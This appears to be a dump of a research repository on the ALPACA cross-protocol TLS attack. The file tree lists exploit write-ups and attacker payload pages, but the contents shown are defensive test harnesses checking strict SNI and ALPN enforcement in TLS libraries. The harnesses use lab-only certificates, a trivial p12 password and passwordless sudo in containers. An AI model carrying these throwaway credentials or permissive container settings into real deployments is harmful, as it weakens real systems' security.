├── evaluation-libraries ├── .gitignore ├── README.md ├── baseimage │ ├── Dockerfile │ ├── Dockerfile-archlinux │ ├── Dockerfile-debian │ ├── build.sh │ ├── certs │ │ └── generate-ca.sh │ └── client.sh ├── bearssl │ ├── CMakeLists.txt │ ├── Dockerfile │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ │ ├── CMakeLists.txt │ │ ├── client.c │ │ └── client.h │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ ├── CMakeLists.txt │ │ ├── server.c │ │ └── server.h ├── botan │ ├── CMakeLists.txt │ ├── Dockerfile │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ │ ├── CMakeLists.txt │ │ └── client.cpp │ ├── cmake │ │ └── FindBotan2.cmake │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ ├── CMakeLists.txt │ │ ├── server.cpp │ │ └── server.h ├── build-everything.sh ├── gnutls │ ├── CMakeLists.txt │ ├── Dockerfile │ ├── LICENSE │ ├── build.sh │ ├── client │ │ ├── CMakeLists.txt │ │ ├── client.c │ │ ├── examples.h │ │ └── tcp.c │ ├── cmake │ │ ├── FindGnuTLS.cmake │ │ ├── FindPackageHandleStandardArgs.cmake │ │ └── FindPackageMessage.cmake │ ├── docker-compose.yml │ ├── readme.md │ ├── run.sh │ └── server │ │ ├── CMakeLists.txt │ │ ├── server.c │ │ └── server.h ├── golang │ ├── Dockerfile │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ │ ├── client.go │ │ └── go.mod │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ ├── go.mod │ │ └── server.go ├── java │ ├── Dockerfile │ ├── LICENSE-java-getopt │ ├── README.md │ ├── build.sh │ ├── client │ │ ├── README.md │ │ ├── lib │ │ │ └── java-getopt-1.0.14.jar │ │ ├── manifest │ │ └── src │ │ │ └── Client.java │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ ├── README.md │ │ ├── lib │ │ └── java-getopt-1.0.14.jar │ │ ├── manifest │ │ └── src │ │ └── Server.java ├── mbedtls │ ├── CMakeLists.txt │ ├── Dockerfile │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ │ ├── CMakeLists.txt │ │ └── client.c │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ ├── CMakeLists.txt │ │ └── 
server.c ├── openssl │ ├── .gitignore │ ├── CMakeLists.txt │ ├── Dockerfile-boringssl │ ├── Dockerfile-openssl │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ │ ├── CMakeLists.txt │ │ ├── client.c │ │ └── client.h │ ├── docker-compose-boringssl.yml │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ ├── CMakeLists.txt │ │ ├── server.c │ │ └── server.h ├── run-everything.sh ├── rustls │ ├── Cargo.toml │ ├── Dockerfile │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ │ └── client.rs │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ └── server.rs └── wolfssl │ ├── CMakeLists.txt │ ├── Dockerfile │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ ├── CMakeLists.txt │ ├── client.c │ └── client.h │ ├── docker-compose.yml │ ├── run.sh │ └── server │ ├── CMakeLists.txt │ ├── server.c │ └── server.h ├── evaluation-servers ├── .gitignore ├── README.md ├── apache │ ├── Dockerfile │ ├── apache.conf │ ├── build.sh │ ├── docker-compose.yml │ └── run.sh ├── build.sh ├── courier │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── imapd-ssl │ ├── run.sh │ ├── smtpd.conf │ └── start.sh ├── cyrus │ ├── Dockerfile │ ├── build.sh │ ├── cyrus.asc │ ├── cyrus.conf │ ├── docker-compose.yml │ ├── imapd.conf │ └── run.sh ├── dovecot │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ └── run.sh ├── exim │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── exim.conf │ └── run.sh ├── filezilla-server │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ └── run.sh ├── lighttpd │ ├── Dockerfile │ ├── Dockerfile-mbedtls │ ├── build.sh │ ├── docker-compose.yml │ ├── lighttpd-mbedtls.conf │ ├── lighttpd.conf │ └── run.sh ├── nginx │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── nginx.conf │ └── run.sh ├── opensmtpd │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── run.sh │ └── smtpd.conf ├── postfix │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── main.cf │ ├── master.cf │ └── run.sh 
├── proftpd │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── proftpd.conf │ └── run.sh ├── pure-ftpd │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ └── run.sh ├── sendmail │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── run.sh │ └── start.sh └── vsftpd │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── run.sh │ ├── start.sh │ └── vsftpd.conf ├── exploits ├── ftp │ ├── 01-pureftpd.md │ ├── 02-proftpd.md │ ├── 03-microsoft-ftp.md │ ├── 04-vsftpd.md │ ├── 05-filezilla.md │ └── 06-serv-u.md ├── imap │ ├── 01-dovecot.md │ ├── 02-courier.md │ ├── 03-exchange.md │ ├── 04-cyrus.md │ ├── 05-kerio-connect.md │ └── 06-zimbra.md ├── pop3 │ ├── 01-dovecot.md │ ├── 02-courier.md │ ├── 03-exchange.md │ ├── 04-cyrus.md │ ├── 05-kerio-connect.md │ └── 06-zimbra.md └── smtp │ ├── 01-postfix.md │ ├── 02-exim.md │ ├── 03-sendmail.md │ ├── 04-mailenable.md │ ├── 05-mdaemon.md │ └── 06-opensmtpd.md └── testlab ├── .gitignore ├── README.md ├── mitmproxy ├── main.py ├── proxy │ ├── __init__.py │ └── socket │ │ ├── __init__.py │ │ ├── mitmsocket.py │ │ └── protocols │ │ ├── __init__.py │ │ ├── ftp.py │ │ ├── imap.py │ │ ├── imaps.py │ │ ├── pop3.py │ │ ├── pop3s.py │ │ └── smtp.py └── utils │ ├── __init__.py │ ├── common.py │ ├── logging.py │ └── tls.py ├── scripts └── show_vsftp_log.sh ├── servers ├── docker-compose.yml └── files │ ├── ftp-proftpd │ ├── Dockerfile │ ├── bob │ │ └── payload.html │ ├── proftpd.conf │ └── tls.conf │ ├── ftp-vsftp │ ├── Dockerfile │ ├── payload.html │ └── vsftpd.conf │ ├── mail-courier │ ├── Dockerfile │ ├── entrypoint.sh │ └── mail.eml │ ├── mail-cyrus │ ├── Dockerfile │ ├── cyradm_commands │ ├── cyrus.conf │ ├── imapd.conf │ └── mails │ │ ├── 1.eml │ │ └── 2.eml │ ├── mail-sendmail │ ├── Dockerfile │ └── entrypoint.sh │ ├── nginx-attacker │ └── html │ │ ├── download │ │ ├── ftps.html │ │ ├── imap.html │ │ └── pop3.html │ │ ├── index.html │ │ ├── reflection │ │ ├── imap.html │ │ └── smtp.html │ │ └── 
upload │ │ ├── ftps.html │ │ └── imaps.html │ └── nginx-target │ └── html │ └── index.php └── setup.sh /evaluation-libraries/.gitignore: -------------------------------------------------------------------------------- 1 | *.vscode 2 | build/ 3 | java/client/bin/Client.class 4 | java/server/bin/Server.class 5 | -------------------------------------------------------------------------------- /evaluation-libraries/README.md: -------------------------------------------------------------------------------- 1 | # evaluation-libraries 2 | TLS-library examples with strict SNI and strict ALPN implemented to prevent the cross-protocol attacks demonstrated in the [ALPACA-Attack](https://alpaca-attack.com/index.html). 3 | 4 | DISCLAIMER: The implementations only focused on the ALPN&SNI TLS-Extensions, i can't guarantee that they are otherwise securely implemented. 5 | 6 | ## Containers 7 | Each library example starts the following containers 8 | - ``server`` with SNI=tls-server.com , ALPN=http/1.1 written in the library 9 | - ``server-openssl-wrong-cn`` with SNI=tls-server.com , ALPN=http/1.1 and a certificate that has a wrong common name 10 | - ``server-openssl-malicious-alpn`` with SNI=tls-server.com and always sends back ALPN=invalid 11 | - ``client`` runs a bash script that does the following tests 12 | 13 | ## Tests 14 | 1. send correct SNI and ALPN to ``server`` and send application data 15 | 2. send wrong SNI to ``server`` (tests SNI on server) 16 | 3. send wrong ALPN to ``server`` (tests ALPN on server) 17 | 4. send correct SNI and ALPN to ``server-openssl-wrong-cn`` (tests strict SNI on client) 18 | 5. send correct SNI and ALPN to ``server-openssl-malicious-alpn`` (tests strict ALPN on client) 19 | 20 | The first test needs to succeed and every other tests needs to return a non-null value. 
21 | 22 | ## How to run 23 | Requires docker, docker-compose and easy-rsa 24 | 25 | This builds all containers, runs all test and puts the results in a file called ``results`` 26 | ``` 27 | ./run-everything.sh 28 | ``` 29 | 30 | ---------------- 31 | ### Running single libraries 32 | First build the baseimage and the openssl image. (The openssl image is required for tests 4 and 5) 33 | ``` 34 | cd baseimage && ./build.sh && cd .. 35 | cd openssl && ./build.sh && cd .. 36 | ``` 37 | 38 | Then go into any of the library folders and start the tests 39 | ``` 40 | ./run.sh 41 | ``` 42 | 43 | -------------------------------------------------------------------------------- /evaluation-libraries/baseimage/Dockerfile: -------------------------------------------------------------------------------- 1 | ARG VERSION=3.15 2 | FROM alpine:${VERSION} 3 | RUN apk add \ 4 | git \ 5 | linux-headers \ 6 | cmake \ 7 | make \ 8 | wget \ 9 | bash \ 10 | autoconf \ 11 | automake \ 12 | coreutils \ 13 | patch \ 14 | gettext-dev \ 15 | gperf \ 16 | pkgconf \ 17 | libtool \ 18 | g++ \ 19 | gcc \ 20 | perl \ 21 | python3 \ 22 | go 23 | COPY ./certs/ca.crt /etc/ssl/certs/ 24 | COPY ./certs /etc/ssl/cert-data 25 | COPY client.sh /client.sh 26 | RUN mkdir /src 27 | RUN mkdir /build 28 | WORKDIR /src/ 29 | -------------------------------------------------------------------------------- /evaluation-libraries/baseimage/Dockerfile-archlinux: -------------------------------------------------------------------------------- 1 | FROM archlinux:base-devel 2 | RUN pacman-key --init 3 | RUN pacman-key --populate archlinux 4 | RUN pacman -Syu --noconfirm 5 | RUN pacman -S git --noconfirm 6 | 7 | #create build user that has root access because archlinux doesn't allow makepkg to be run as root 8 | RUN useradd --no-create-home --shell=/bin/false build && usermod -L build 9 | RUN echo "build ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers 10 | RUN echo "root ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers 11 | 12 | COPY 
./certs/ca.crt /etc/ssl/certs/ 13 | COPY ./certs /etc/ssl/cert-data 14 | COPY client.sh /client.sh 15 | RUN mkdir /src 16 | WORKDIR /src/ 17 | RUN chown build /src -------------------------------------------------------------------------------- /evaluation-libraries/baseimage/Dockerfile-debian: -------------------------------------------------------------------------------- 1 | ARG VERSION=bullseye 2 | FROM debian:${VERSION} 3 | RUN apt-get update && apt-get install -y \ 4 | git \ 5 | cmake \ 6 | make \ 7 | wget \ 8 | bash \ 9 | autoconf \ 10 | automake \ 11 | coreutils \ 12 | patch \ 13 | gperf \ 14 | pkgconf \ 15 | libtool \ 16 | g++ \ 17 | gcc \ 18 | perl \ 19 | python3 \ 20 | golang 21 | COPY ./certs/ca.crt /etc/ssl/certs/ 22 | COPY ./certs /etc/ssl/cert-data 23 | COPY client.sh /client.sh 24 | RUN mkdir /src 25 | RUN mkdir /build 26 | WORKDIR /src/ 27 | -------------------------------------------------------------------------------- /evaluation-libraries/baseimage/build.sh: -------------------------------------------------------------------------------- 1 | (cd certs 2 | ./generate-ca.sh); 3 | 4 | docker build -t tls-baseimage . 5 | docker build -t tls-baseimagedebian -f Dockerfile-debian . 6 | docker build -t tls-baseimage-archlinux -f Dockerfile-archlinux . 
7 | -------------------------------------------------------------------------------- /evaluation-libraries/baseimage/certs/generate-ca.sh: -------------------------------------------------------------------------------- 1 | DIR="`pwd`/`dirname "$0"`/" 2 | 3 | echo $DIR 4 | 5 | if [ "$OS" = "Darwin" ]; then 6 | brew install easy-rsa 7 | else 8 | apt-get install -y easy-rsa 9 | fi 10 | 11 | path="/usr/share/easy-rsa/" 12 | if [ "$OS" = "Darwin" ]; then 13 | path="" 14 | DIR_MAC="/usr/local/etc/" 15 | fi 16 | echo -e "${GREEN}[CERT] Creating PKI${NC}" 17 | ${path}easyrsa init-pki --pki-dir = "$DIR/pki" 18 | cat << EOF > "$DIR/pki/vars" 19 | set_var EASYRSA_DN "cn_only" 20 | set_var EASYRSA_DIGEST "sha512" 21 | set_var EASYRSA_BATCH "1" 22 | set_var EASYRSA_REQ_CN "alpaca.poc" 23 | EOF 24 | dd if=/dev/urandom of="$DIR/pki/.rnd" bs=256 count=1 2> /dev/null 25 | echo -e "${GREEN}[CERT] Build CA${NC}" 26 | ${path}easyrsa build-ca nopass 27 | 28 | echo -e "${GREEN}[CERT] Generating Certificates${NC}" 29 | ${path}easyrsa --req-cn="tls-server.com" gen-req tls-server.com nopass 30 | ${path}easyrsa sign-req server tls-server.com 31 | 32 | ${path}easyrsa --req-cn="wrong-cn.com" gen-req wrong-cn.com nopass 33 | ${path}easyrsa sign-req server wrong-cn.com 34 | 35 | #copy certs 36 | cp "$DIR/pki/issued/tls-server.com.crt" "$DIR" 37 | cp "$DIR/pki/private/tls-server.com.key" "$DIR" 38 | cp "$DIR/pki/issued/wrong-cn.com.crt" "$DIR" 39 | cp "$DIR/pki/private/wrong-cn.com.key" "$DIR" 40 | cp "$DIR/pki/ca.crt" "$DIR" 41 | 42 | #generate chains 43 | cat "$DIR/tls-server.com.crt" >> "$DIR/tls-server.com-chain.crt" 44 | cat "$DIR/ca.crt" >> "$DIR/tls-server.com-chain.crt" 45 | 46 | #generate chains 47 | cat "$DIR/wrong-cn.com.crt" >> "$DIR/wrong-cn.com-chain.crt" 48 | cat "$DIR/ca.crt" >> "$DIR/wrong-cn.com-chain.crt" 49 | 50 | #generate p12 51 | openssl pkcs12 -export -in "$DIR/tls-server.com.crt" -inkey "$DIR/tls-server.com.key" -out "$DIR/tls-server.com.p12" -password pass:123456 52 | 
openssl pkcs12 -export -in "$DIR/wrong-cn.com.crt" -inkey "$DIR/wrong-cn.com.key" -out "$DIR/wrong-cn.com.p12" -password pass:123456 53 | 54 | openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in tls-server.com.key -out tls-server.com.pkcs8.key 55 | openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in wrong-cn.com.key -out wrong-cn.com.pkcs8.key 56 | 57 | #if [ "$OS" = "Darwin" ]; then 58 | # DIR_MAC="/usr/local/etc" 59 | #else 60 | # DIR_MAC=${DIR} 61 | #fi 62 | # 63 | #mkdir -p "$DIR/servers/files/cert/" 2> /dev/null 64 | #cp "$DIR_MAC/pki/issued/attacker.com.crt" "$DIR/servers/files/cert/" 65 | #cp "$DIR_MAC/pki/private/attacker.com.key" "$DIR/servers/files/cert/" 66 | # 67 | #${path}easyrsa --req-cn="target.com" gen-req target.com nopass 68 | #${path}easyrsa sign-req server target.com 69 | # 70 | #cp "$DIR_MAC/pki/issued/target.com.crt" "$DIR/servers/files/cert/" 71 | #cp "$DIR_MAC/pki/private/target.com.key" "$DIR/servers/files/cert/" 72 | -------------------------------------------------------------------------------- /evaluation-libraries/baseimage/client.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #$1 command to run 3 | #$2 server1 to connect 4 | #$3 server2 to connect 5 | #$4 openssl-malicious-alpn server 6 | #$5 wait seconds before starting 7 | 8 | results=() 9 | 10 | sleep $5 11 | 12 | echo "------------ Test 1: SNI=tls-server.com ALPN=http/1.1 ------------------" 13 | $1 -h $2 -s tls-server.com -a http/1.1 14 | results+=($?) 15 | 16 | echo "------------ Test 2: SNI=example.com ALPN=http/1.1 ------------------" 17 | /openssl-client -h $2 -s example.com -a http/1.1 18 | results+=($?) 19 | 20 | echo "------------ Test 3: SNI=tls-server.com ALPN=invalid ------------------" 21 | /openssl-client -h $2 -s tls-server.com -a invalid 22 | results+=($?) 
23 | 24 | echo "------------ Test 4: wrong certificate by server ------------------" 25 | $1 -h $3 -s tls-server.com -a http/1.1 26 | results+=($?) 27 | 28 | echo "------------ Test 5: server sends wrong alpn ------------------" 29 | $1 -h $4 -s tls-server.com -a http/1.1 30 | results+=($?) 31 | 32 | RED='\033[0;31m ' 33 | GREEN='\033[0;32m ' 34 | NC='\033[0m' # No Color 35 | 36 | echo "" > results 37 | 38 | for i in "${!results[@]}"; do 39 | test=$((i+1)) 40 | if [ $i = "0" ]; then #first test needs to return 0 41 | if [ ${results[$i]} = "0" ]; 42 | then 43 | echo -e "${GREEN}Test$test success! exitcode:${results[$i]}" >> results; 44 | else 45 | echo -e "${RED}Test$test FAILED! exitcode:${results[$i]}" >> results; 46 | fi 47 | else #every other test needs to return non-zero value 48 | if [ ${results[$i]} = "0" ]; 49 | then 50 | echo -e "${RED}Test$test FAILED! exitcode:${results[$i]}" >> results; 51 | else 52 | echo -e "${GREEN}Test$test success! exitcode:${results[$i]}" >> results; 53 | fi 54 | fi 55 | done 56 | 57 | cat results -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-bearssl VERSION 0.1.0) 3 | 4 | 5 | 6 | add_subdirectory(client) 7 | add_subdirectory(server) 8 | -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-openssl as tls-bearssl 3 | ARG VERSION=0.6 4 | 5 | RUN apk add sed 6 | 7 | WORKDIR /build 8 | RUN git clone --depth=1 --branch=v${VERSION} https://www.bearssl.org/git/BearSSL 9 | WORKDIR /build/BearSSL 10 | RUN make 11 | 12 | 13 | 14 | 15 | WORKDIR /build 16 | ADD server /build/server 17 | ADD client /build/client 18 | ADD 
CMakeLists.txt /build/CMakeLists.txt 19 | 20 | # generate c code from private keys and certs 21 | RUN ls /build/server/ 22 | RUN /build/BearSSL/build/brssl ta /etc/ssl/cert-data/ca.crt | tail -n +2 >> /build/client/client.h 23 | RUN /build/BearSSL/build/brssl chain /etc/ssl/cert-data/tls-server.com-chain.crt | tail -n +2 >> /build/server/server.h 24 | RUN /build/BearSSL/build/brssl skey -C /etc/ssl/cert-data/tls-server.com.key | tail -n +2 >> /build/server/server.h 25 | 26 | # wrong-cn.com key&cert need different variable names 27 | RUN /build/BearSSL/build/brssl chain /etc/ssl/cert-data/wrong-cn.com-chain.crt | tail -n +2 | sed "s/\(\(CERT[01]\)\|\(CHAIN\(_LEN\)\?\)\|\(RSA\(_[DIPQ]\*\)\?\)\)/WRONG_\1/g" >> /build/server/server.h 28 | RUN /build/BearSSL/build/brssl skey -C /etc/ssl/cert-data/wrong-cn.com.key | tail -n +2 | sed "s/\(\(CERT[01]\)\|\(CHAIN\(_LEN\)\?\)\|\(RSA\(_[DIPQ]\*\)\?\)\)/WRONG_\1/g" >> /build/server/server.h 29 | 30 | 31 | RUN cmake . .. && make 32 | RUN mv /build/server/server / 33 | RUN mv /build/client/client / 34 | COPY --from=tls-openssl /openssl-client /openssl-client 35 | 36 | 37 | WORKDIR / 38 | CMD ["/server"] -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2016 Thomas Pornin 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining 4 | a copy of this software and associated documentation files (the 5 | "Software"), to deal in the Software without restriction, including 6 | without limitation the rights to use, copy, modify, merge, publish, 7 | distribute, sublicense, and/or sell copies of the Software, and to 8 | permit persons to whom the Software is furnished to do so, subject to 9 | the following conditions: 10 | 11 | The above copyright notice and this permission notice shall be 12 | included in all copies or substantial portions of the 
Software. 13 | 14 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 15 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 16 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 17 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS 18 | BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN 19 | ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN 20 | CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/README.md: -------------------------------------------------------------------------------- 1 | # bearssl example with strict sni and strict alpn 2 | 3 | Tested with bearSSL 0.6 4 | 5 | needs tls-baseimage already in docker 6 | 7 | Based on BearSSL/tools/server.c and client.c 8 | 9 | ```bash 10 | ./run.sh 11 | ``` 12 | 13 | 14 | -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/build.sh: -------------------------------------------------------------------------------- 1 | docker build --build-arg VERSION=0.6 . 
-t tls-bearssl -f Dockerfile 2 | -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/client/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(client VERSION 0.1.0) 3 | 4 | #include_directories(${CMAKE_SOURCE_DIR}/BearSSL/inc) 5 | add_library(brssl STATIC IMPORTED) 6 | set_target_properties(brssl PROPERTIES 7 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/BearSSL/build/libbearssl.a" 8 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/BearSSL/inc" 9 | ) 10 | add_executable(client client.c) 11 | target_link_libraries(client brssl) 12 | target_compile_options(client PRIVATE -Wall -Wextra) 13 | -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/client/client.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2016 Thomas Pornin 3 | * 4 | * Permission is hereby granted, free of charge, to any person obtaining 5 | * a copy of this software and associated documentation files (the 6 | * "Software"), to deal in the Software without restriction, including 7 | * without limitation the rights to use, copy, modify, merge, publish, 8 | * distribute, sublicense, and/or sell copies of the Software, and to 9 | * permit persons to whom the Software is furnished to do so, subject to 10 | * the following conditions: 11 | * 12 | * The above copyright notice and this permission notice shall be 13 | * included in all copies or substantial portions of the Software. 14 | * 15 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 16 | * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 17 | * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 18 | * NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS 19 | * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN 20 | * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN 21 | * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 22 | * SOFTWARE. 23 | */ 24 | 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | 38 | 39 | /* 40 | * Connect to the specified host and port. The connected socket is 41 | * returned, or -1 on error. 42 | */ 43 | static int 44 | host_connect(const char *host, const char *port) { 45 | struct addrinfo hints, *si, *p; 46 | int fd; 47 | int err; 48 | 49 | memset(&hints, 0, sizeof hints); 50 | hints.ai_family = PF_UNSPEC; 51 | hints.ai_socktype = SOCK_STREAM; 52 | err = getaddrinfo(host, port, &hints, &si); 53 | if (err != 0) { 54 | fprintf(stderr, "ERROR: getaddrinfo(): %s\n", 55 | gai_strerror(err)); 56 | return -1; 57 | } 58 | fd = -1; 59 | for (p = si; p != NULL; p = p->ai_next) { 60 | struct sockaddr *sa; 61 | void *addr; 62 | char tmp[INET6_ADDRSTRLEN + 50]; 63 | 64 | sa = (struct sockaddr *)p->ai_addr; 65 | if (sa->sa_family == AF_INET) { 66 | addr = &((struct sockaddr_in *)sa)->sin_addr; 67 | } else if (sa->sa_family == AF_INET6) { 68 | addr = &((struct sockaddr_in6 *)sa)->sin6_addr; 69 | } else { 70 | addr = NULL; 71 | } 72 | if (addr != NULL) { 73 | inet_ntop(p->ai_family, addr, tmp, sizeof tmp); 74 | } else { 75 | sprintf(tmp, "", 76 | (int)sa->sa_family); 77 | } 78 | //fprintf(stderr, "connecting to: %s\n", tmp); 79 | fd = socket(p->ai_family, p->ai_socktype, p->ai_protocol); 80 | if (fd < 0) { 81 | perror("socket()"); 82 | continue; 83 | } 84 | if (connect(fd, p->ai_addr, p->ai_addrlen) < 0) { 85 | perror("connect()"); 86 | close(fd); 87 | continue; 88 | } 89 | break; 90 | } 91 | if (p == NULL) { 92 | freeaddrinfo(si); 93 | fprintf(stderr, "ERROR: failed to connect\n"); 94 | 
return -1; 95 | } 96 | freeaddrinfo(si); 97 | //fprintf(stderr, "connected.\n"); 98 | return fd; 99 | } 100 | 101 | /* 102 | * Low-level data read callback for the simplified SSL I/O API. 103 | */ 104 | static int 105 | sock_read(void *ctx, unsigned char *buf, size_t len) { 106 | for (;;) { 107 | ssize_t rlen; 108 | 109 | rlen = read(*(int *)ctx, buf, len); 110 | if (rlen <= 0) { 111 | if (rlen < 0 && errno == EINTR) { 112 | continue; 113 | } 114 | return -1; 115 | } 116 | return (int)rlen; 117 | } 118 | } 119 | 120 | /* 121 | * Low-level data write callback for the simplified SSL I/O API. 122 | */ 123 | static int 124 | sock_write(void *ctx, const unsigned char *buf, size_t len) { 125 | for (;;) { 126 | ssize_t wlen; 127 | 128 | wlen = write(*(int *)ctx, buf, len); 129 | if (wlen <= 0) { 130 | if (wlen < 0 && errno == EINTR) { 131 | continue; 132 | } 133 | return -1; 134 | } 135 | return (int)wlen; 136 | } 137 | } -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | bearssl-server: 8 | image: tls-bearssl 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | bearssl-client: 16 | image: tls-bearssl 17 | command: [ "./client.sh", "/client", "bearssl-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - bearssl-server 20 | - openssl-server-wrong-cn 21 | - openssl-malicious-alpn 22 | -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/run.sh: 
-------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from bearssl-client --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/server/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(server VERSION 0.1.0) 3 | 4 | #include_directories(${CMAKE_SOURCE_DIR}/BearSSL/inc) 5 | add_library(brssl STATIC IMPORTED) 6 | set_target_properties(brssl PROPERTIES 7 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/BearSSL/build/libbearssl.a" 8 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/BearSSL/inc" 9 | ) 10 | add_executable(server server.c) 11 | target_link_libraries(server brssl) 12 | target_compile_options(server PRIVATE -Wall -Wextra) -------------------------------------------------------------------------------- /evaluation-libraries/botan/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-botan VERSION 0.1.0) 3 | 4 | 5 | set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${CMAKE_CURRENT_SOURCE_DIR}/cmake) 6 | include(CMakeToolsHelpers OPTIONAL) 7 | include(FeatureSummary) 8 | 9 | include(CheckCCompilerFlag) 10 | include(CheckCXXCompilerFlag) 11 | include(CheckCXXSourceCompiles) 12 | 13 | 14 | 15 | add_subdirectory(client) 16 | add_subdirectory(server) -------------------------------------------------------------------------------- /evaluation-libraries/botan/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage as tls-botan 3 | ARG VERSION=2.18.1 4 | RUN wget https://botan.randombit.net/releases/Botan-${VERSION}.tar.xz 5 | RUN tar -xf Botan-${VERSION}.tar.xz 6 | WORKDIR /src/Botan-${VERSION} 7 | RUN apk add 
python2 8 | RUN ./configure.py --prefix=/build/ 9 | RUN make 10 | RUN make install 11 | RUN mv libbotan-2.a /lib/libbotan-2.a 12 | RUN mv /build/include/* /usr/include/ 13 | 14 | ADD cmake /build/cmake 15 | ADD server /build/server 16 | ADD client /build/client 17 | ADD CMakeLists.txt /build/CMakeLists.txt 18 | WORKDIR /build 19 | RUN cmake . .. && make 20 | RUN mv /build/server/server / 21 | RUN mv /build/client/client / 22 | COPY --from=tls-openssl /openssl-client /openssl-client 23 | WORKDIR / 24 | CMD ["/server"] 25 | -------------------------------------------------------------------------------- /evaluation-libraries/botan/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (C) 1999-2021 The Botan Authors 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, 8 | this list of conditions, and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright 11 | notice, this list of conditions, and the following disclaimer in the 12 | documentation and/or other materials provided with the distribution. 13 | 